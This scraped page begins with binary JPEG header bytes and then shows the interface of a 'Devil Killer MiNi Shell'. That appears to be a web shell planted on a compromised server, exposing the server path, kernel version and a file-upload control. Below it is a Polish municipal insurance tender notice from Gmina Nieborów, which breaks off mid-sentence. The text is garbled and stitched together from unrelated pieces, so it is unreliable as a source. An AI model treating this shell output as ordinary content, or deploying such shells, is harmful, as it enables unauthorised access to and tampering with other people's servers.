JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231122/0050241301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> PROGRAM KOMPLEKSOWEJ OCHRONY UBEZPIECZENIOWEJ DLA GMINY NIEBORÓW I JEJ JEDNOSTEK ORGANIZACYJNYCH NA LATA 2023-2026 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Nieborów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 750148360</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Legionów Polskich 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nieborów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">99-416</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL715 - Skierniewicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@nieborow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nieborow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PROGRAM KOMPLEKSOWEJ OCHRONY UBEZPIECZENIOWEJ DLA GMINY NIEBORÓW I JEJ JEDNOSTEK ORGANIZACYJNYCH NA LATA 2023-2026 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7e2ecc6a-8863-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00502413</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00020030/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 PROGRAM KOMPLEKSOWEJ OCHRONY UBEZPIECZENIOWEJ DLA GMINY NIEBORÓW I JEJ JEDNOSTEK ORGANIZACYJNYCH NA LATA 2023-2026</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gmina-nieborow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">środek komunikacji elektronicznej, przy użyciu, którego odbywa się komunikacja w<br/>Postępowaniu, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a<br/>Wykonawcą. System, o którym mowa w poprzednim zdaniu, znajduje się pod adresem:<br/>https://gmina-nieborow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w Postępowaniu, w tym<br/>składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa<br/>się przy użyciu środków komunikacji elektronicznej – za pośrednictwem Platformy Zakupowej:<br/>https://gmina-nieborow.ezamawiajacy.pl/<br/>2. System teleinformatyczny w postaci Platformy Zakupowej spełnia wymagania określone w PZP, w szczególności w art. 64 i 68<br/>PZP oraz w § 11 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>3. Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat<br/>SSL zapewnia poufność transmisji danych przesyłanych przez Internet.<br/>4. Każdy Wykonawca posiadający konto na Platformie Zakupowej ma możliwości złożenia, zmiany, wycofania oferty, a także<br/>funkcjonalności pozwalające na zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>5. Instrukcja korzystania z Platformy jest dostępna pod wyżej wskazanym adresem w zakładce „Regulacje i procedury procesu<br/>zakupowego” oraz stanowi załącznik nr 10 do SWZ.<br/>6. Zamawiający wskazuje ogólne zasady korzystania z Platformy Zakupowej:<br/>1) Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Gminy Nieborów https://gminanieborow.<br/>ezamawiajacy.pl/ lub https://oneplace.marketplanet.pl,<br/>2) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”.<br/>3) W uzasadnionych przypadkach (np. wprowadzenie danych niezgodnych z danymi rejestrowymi) rejestracja Wykonawcy może<br/>potrwać maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego<br/>na rejestrację w procesie złożenia oferty w postaci elektronicznej.<br/>4) Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury<br/>założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>5) Po założeniu konta Wykonawca ma możliwość złożenia oferty w Postępowaniu. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w postaci elektronicznej za pośrednictwem<br/>Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania/złożenia za pośrednictwem<br/>zakładki „Korespondencja”. Aktualna data i godzina, zsynchronizowane są z zegarem Głównym Urzędem Miar.<br/>6) Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa Gmina Nieborów tel. +48 22 257 22 23<br/>(infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl<br/>oneplace@marketplanet.pl<br/>7. Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.: (...)<br/>POZOSTAŁE IN FORMACJE W SWZ - rozdział XV</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• Administratorem Pani/Pana danych osobowych jest Gmina Nieborów reprezentowa-na przez Wójta Gminy Nieborów z siedzibą w<br/>Urzędzie Gminy Nieborów przy Le-gionów Polskich 26, 99-416 Nieborów. Z administratorem można się skontaktować listownie na<br/>adres podany powyżej, przez e-mail: gmina@nieborow.pl oraz telefo-nicznie: +48 (46) 838 56 13<br/>• Inspektorem ochrony danych osobowych w Gminie Nieborów jest Robert Żuchowski e-mail: iodo@spotcase.pl<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu realizacji obowiązku prawnego<br/>nałożonego na administratora wynikającego z ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych obejmującego<br/>przeprowadzenie postępowania o udzielenie zamówienia publicznego: „PROGRAM KOMPLEKSOWEJ OCHRONY<br/>UBEZPIECZENIOWEJ DLA GMINY NIEBORÓW I JEJ JEDNOSTEK ORGANIZACYJNYCH NA LATA 2023-2026” Znak sprawy:GKI.271.19.2023, prowadzonego w trybie podstawowym na podstawie art. 275 pkt 1 ustawy Prawo zamówień publicznych, zawarcia<br/>i wykonania umowy oraz prowadze-nia dokumentacji z nią związanej.<br/>• Dane osobowe mogą być ujawnione jedynie właściwie upoważnionym osobom fi-zycznym, prawnym lub innym odbiorcom<br/>posiadającym podstawę prawną żądania dostępu do danych osobowych oraz odbiorcom, którym muszą zostać ujawnione dane<br/>zgodnie z obowiązującymi przepisami prawa. Odbiorcami danych mogą być osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 ust. 1 Ustawy pzp Odbiorcą danych będzie spółka Otwarty Rynek Elektro-niczny<br/>S.A. siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru<br/>Sądowego, prowadzonego przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru<br/>Sądowego pod numerem KRS: 0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na<br/>której Gmina Nieborów prowa-dzi postępowania o udzielenie zamówienia publicznego, działającą pod adresem: https://gminanieborow.<br/>ezamawiajacy.pl/;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>o Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pa-ni/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z usta-wy Pzp;<br/>o W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmo-wane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>Posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczą-cych;<br/>• na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwa-rzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobo-wych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych oso-bowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKI.271.19.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest kompleksowe ubezpieczenie na lata 2023-2026.<br/>2.	Przedmiot zamówienia<br/>1)	UBEZPIECZENIE MIENIA, NASTĘPSTW NIESZCZĘŚLIWYCH WYPADKÓW I ODPOWIEDZIALNOŚCI CYWILNEJ <br/>a)	Ubezpieczenie mienia od wszystkich ryzyk,<br/>b)	Ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk,<br/>c)	Ubezpieczenie szyb,<br/>d)	Ubezpieczenie mienia w transporcie krajowym<br/>e)	Ubezpieczenie następstw nieszczęśliwych wypadków<br/>f)	Ubezpieczenie odpowiedzialności cywilnej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66512100-3 - Usługi ubezpieczenia od następstw nieszczęśliwych wypadków</p> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">66515100-4 - Usługi ubezpieczenia od ognia</p> <p class="mb-0">66515400-7 - Usługi ubezpieczenia od skutków żywiołów</p> <p class="mb-0">66516000-0 - Usługi ubezpieczenia od odpowiedzialności cywilnej</p> <p class="mb-0">66516400-4 - Usługi ubezpieczenia od ogólnej odpowiedzialności cywilnej</p> <p class="mb-0">66515411-7 - Usługi ubezpieczenia od odpowiedzialności finansowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-12-15 do 2026-12-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>cena - 80%<br/>klauzule dodatkowe fakultatywne - 20%<br/>2. Opis kryteriów:<br/>Kryterium „Cena”<br/>Maksymalną liczbę punktów w kryterium „Cena” otrzyma oferta z najniższą ceną. Liczba punktów w kryterium „Cena” zostanie<br/>obliczona zgodnie ze wzorem:<br/>Cena najtańszej ważnej oferty<br/>Cn = ---------------------------------------- × Kp × Wc<br/>Cena oferty badanej<br/>gdzie:<br/>Cn – liczba punktów w kryterium „Cena”<br/>Kp – współczynnik proporcjonalności = 100<br/>Wc – waga procentowa dla kryterium „Cena”= 80%<br/>Kryterium „Klauzule dodatkowe fakultatywne”<br/>Ocena ofert w kryterium „Klauzule dodatkowe fakultatywne”, zostanie dokonana na podstawie formularza (Załącznik nr 5 do SWZ)<br/>zawartego w złożonej ofercie, z przyznaniem ocenianej ofercie „małych” punktów, określonych przy poszczególnych klauzulach.<br/>Punkty „małe” za warunki pośrednie (zmodyfikowane przez Wykonawców) nie będą przyznawane. Maksymalną liczbę „małych”<br/>punktów (100 pkt), otrzyma oferta tego Wykonawcy, który przyjmie wszystkie klauzule dodatkowe fakultatywne, a pozostałe oferty<br/>otrzymają odpowiednio mniej punktów, w zależności od przyjętych klauzul i postanowień. Liczba punktów w kryterium „Klauzule<br/>dodatkowe fakultatywne” zostanie obliczona zgodnie ze wzorem:<br/>Imp<br/>Pp = ---------------------------------- × Kp × Wk<br/>100 pkt<br/>gdzie:<br/>Pp – liczba punktów w kryterium „Klauzule dodatkowe fakultatywne”<br/>Imp – liczba „małych” punktów przyznanych ocenianej ofercie za przyjęte klauzule dodatkowe fakultatywne<br/>Kp – współczynnik proporcjonalności = 100<br/>Wk – waga procentowa dla kryterium „Klauzule dodatkowe fakultatywne” = 20%<br/>Łączna liczba punktów oferty stanowi sumę liczby punktów przyznanych w kryterium „Cena” (Cn) i liczby punktów przyznanych w<br/>kryterium „Klauzule dodatkowe fakultatywne” (Pp). Jako najkorzystniejsza zostanie wybrana oferta, która uzyska największą łączną<br/>liczbę punktów wyliczonych zgodnie z powyższym.<br/>3. W toku dokonywania oceny złożonych ofert Zamawiający może żądać udzielenia przez Wykonawców wyjaśnień dotyczących<br/>treści złożonych przez nich ofert.<br/>4. Zamawiający poprawi w ofercie oczywiste omyłki pisarskie, oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji<br/>rachunkowych dokonanych poprawek oraz inne omyłki polegające na niezgodności oferty z dokumentami zamówienia,<br/>niepowodujące istotnych zmian w treści oferty, niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Klauzule dodatkowe fakultatywne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3) Warunek w zakresie posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów<br/>Warunek ten zostaje spełniony, jeżeli Wykonawca posiada odpowiednie zezwolenie, licencję, koncesję lub wpis do rejestru<br/>działalności regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia określonych usług objętych przedmiotem<br/>zamówienia w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.<br/>W przypadku wykonawców mających siedzibę na terenie Rzeczypospolitej Polskiej oznacza to, że Wykonawca musi mieć<br/>zezwolenie na prowadzenie działalności ubezpieczeniowej w myśl ustawy z dnia 11 września 2015 r. o działalności<br/>ubezpieczeniowej i reasekuracyjnej w zakresie tożsamym z przedmiotem zamówienia (tj. w zakresie grup ryzyk objętych<br/>przedmiotem zamówienia). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu wykazania braku<br/>podstaw wykluczenia z Postępowania oraz spełnienia warunków udziału w Postępowaniu, Wykonawca zobowiązany jest złożyć<br/>wraz z ofertą aktualne na dzień składania ofert oświadczenie o:<br/>1) niepodleganiu wykluczeniu z Postępowania;<br/>2) spełnianiu warunków udziału w Postępowaniu.<br/>2. Wzór oświadczenia, o którym mowa w ust. 1 powyżej, stanowi Załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3.<br/>Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż<br/>5 dni od dnia wezwania, następujących podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:<br/>1) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów z innym Wykonawcą, który złożył odrębną<br/>ofertę/ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty/oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy<br/>kapitałowej (wzór oświadczenia stanowi załącznik nr 7 do SWZ),<br/>2) zezwolenia, licencji, koncesji lub dokumentu potwierdzającego wpis do rejestru działalności regulowanej, niezbędnych do<br/>świadczenia określonych usług objętych przedmiotem zamówienia kraju, w którym Wykonawca ma siedzibę lub 